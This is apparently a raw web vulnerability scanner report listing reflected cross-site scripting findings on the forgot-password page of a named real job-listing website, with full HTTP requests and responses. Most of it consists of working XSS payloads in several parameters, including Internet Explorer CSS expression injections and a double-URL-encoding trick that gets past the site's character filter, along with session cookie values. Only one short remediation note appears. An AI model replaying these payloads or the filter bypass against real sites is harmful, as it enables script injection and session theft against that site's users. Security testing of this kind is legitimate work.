Date: Fri, 29 Apr 2011 21:09:22 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the formid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7db83"><a>0b5858b10bb was submitted in the formid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&formid=107db83"><a>0b5858b10bb&rand=662813&choice=1 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:19:22 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on&formid=107db83"><a>0b5858b10bb&rand=805514&choice=2">
...[SNIP]...
The value of the formid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98f22"style%3d"x%3aexpression(alert(1))"386752025378121a2 was submitted in the formid parameter. This input was echoed as 98f22"style="x:expression(alert(1))"386752025378121a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The original request used the POST method; however, it was possible to convert the request to the GET method to simplify demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=1098f22"style%3d"x%3aexpression(alert(1))"386752025378121a2&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the formname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 799ac"style%3d"x%3aexpression(alert(1))"4abc07c70f3b31178 was submitted in the formname parameter. This input was echoed as 799ac"style="x:expression(alert(1))"4abc07c70f3b31178 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The original request used the POST method; however, it was possible to convert the request to the GET method to simplify demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0799ac"style%3d"x%3aexpression(alert(1))"4abc07c70f3b31178&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:24 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the library_errormessage request parameter is copied into the HTML document as plain text between tags. The payload fa763%253cscript%253ealert%25281%2529%253c%252fscript%253e0885d9cb6b2590cc1 was submitted in the library_errormessage parameter. This input was echoed as fa763<script>alert(1)</script>0885d9cb6b2590cc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character.
The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the library_errormessage request parameter, as the web server will already have carried out one decode. In any case, the application should perform its input validation only after any custom canonicalisation has been carried out, so that the value being validated is the value that is actually used.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520fa763%253cscript%253ealert%25281%2529%253c%252fscript%253e0885d9cb6b2590cc1&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:52 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
</li> fa763<script>alert(1)</script>0885d9cb6b2590cc1 </ul>
...[SNIP]...
The value of the library_errormessage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ccda"style%3d"x%3aexpression(alert(1))"396e9a22eeb45e270 was submitted in the library_errormessage parameter. This input was echoed as 8ccda"style="x:expression(alert(1))"396e9a22eeb45e270 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%25208ccda"style%3d"x%3aexpression(alert(1))"396e9a22eeb45e270&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the old_choice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b86e"style%3d"x%3aexpression(alert(1))"aca403b3b was submitted in the old_choice parameter. This input was echoed as 8b86e"style="x:expression(alert(1))"aca403b3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:29'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate
The value of the old_choice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67674"style%3d"x%3aexpression(alert(1))"47dcb2bfae6b18167 was submitted in the old_choice parameter. This input was echoed as 67674"style="x:expression(alert(1))"47dcb2bfae6b18167 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=267674"style%3d"x%3aexpression(alert(1))"47dcb2bfae6b18167&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8
The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c93e5"><a>3041bdbfc36 was submitted in the rand parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:00 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
